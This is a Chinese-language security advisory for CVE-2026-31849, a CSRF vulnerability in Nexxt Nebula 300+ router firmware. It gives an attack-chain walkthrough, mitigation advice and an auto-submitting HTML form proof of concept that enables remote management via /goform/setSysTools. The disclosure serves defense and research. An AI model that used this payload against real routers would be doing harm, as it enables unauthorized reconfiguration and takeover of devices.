IPBUF安全漏洞报告
English
CVE-2026-31849 CVSS 6.5 中危

CVE-2026-31849 Nexxt Nebula 300+ CSRF漏洞

披露日期: 2026-03-23
来源: 309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c

漏洞信息

漏洞编号
CVE-2026-31849
漏洞类型
CSRF (跨站请求伪造)
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Nexxt Solutions Nebula 300+

相关标签

CSRFNexxt SolutionsNebula 300+RouterIoTCWE-352

漏洞概述

Nexxt Solutions Nebula 300+路由器固件在12.01.01.37及之前版本存在跨站请求伪造(CSRF)漏洞。由于系统未在/goform/setSysTools等关键状态更改端点实施CSRF保护机制,攻击者可诱导已认证的管理员访问恶意网页。这将导致在管理员浏览器上下文中执行未经授权的请求,进而修改系统配置或启用特定服务,严重威胁设备完整性。

技术细节

该漏洞的根源在于Nexxt Solutions Nebula 300+固件的管理后台未在敏感操作接口(如/goform/setSysTools)中实施有效的CSRF防御机制。在标准的Web安全模型中,涉及状态变更的操作应当验证请求来源,通常通过CSRF Token或Referer头部校验实现。受影响版本仅依赖会话Cookie进行身份验证,未对请求的合法性进行二次确认。

攻击者无需获取管理员凭据,只需构造包含恶意HTML表单或JavaScript代码的页面,诱导已登录管理员访问。当管理员浏览器加载该页面时,会自动携带目标域的有效Cookie向路由器发送POST或GET请求。由于服务端缺乏来源验证,将误认为操作是管理员本人的合法行为,从而执行攻击者预设的配置修改命令,导致系统完整性受损。

攻击链分析

STEP 1
侦察
攻击者确认目标使用的是Nexxt Solutions Nebula 300+路由器,且固件版本在12.01.01.37及以下。
STEP 2
构建Payload
攻击者利用HTML表单或JavaScript编写恶意代码,向/goform/setSysTools等端点发送包含恶意参数的请求。
STEP 3
社会工程学
攻击者将恶意代码托管在网站上,并通过钓鱼邮件或其他方式诱导已登录路由器后台的管理员点击访问。
STEP 4
执行攻击
管理员浏览器在访问恶意页面时,自动携带当前会话Cookie向路由器发送请求。
STEP 5
达成效果
路由器验证Cookie有效,误以为是管理员操作,执行恶意请求,导致系统配置被篡改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CSRF PoC for CVE-2026-31849 --> <!-- Target: Nexxt Solutions Nebula 300+ Firmware <= 12.01.01.37 --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://<TARGET_IP>/goform/setSysTools" method="POST"> <!-- Example payload to change system settings --> <input type="hidden" name="operation" value="modify_config" /> <input type="hidden" name="setting_name" value="remote_management" /> <input type="hidden" name="setting_value" value="enable" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

影响范围

Nexxt Solutions Nebula 300+ <= 12.01.01.37

防御指南

临时缓解措施
建议管理员在未升级固件前,养成使用完毕后立即登出管理后台的习惯,避免在浏览其他网页时保持登录状态。同时,严格限制管理后台的访问来源IP地址,仅允许可信的内网IP进行管理操作,切勿点击不明链接。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表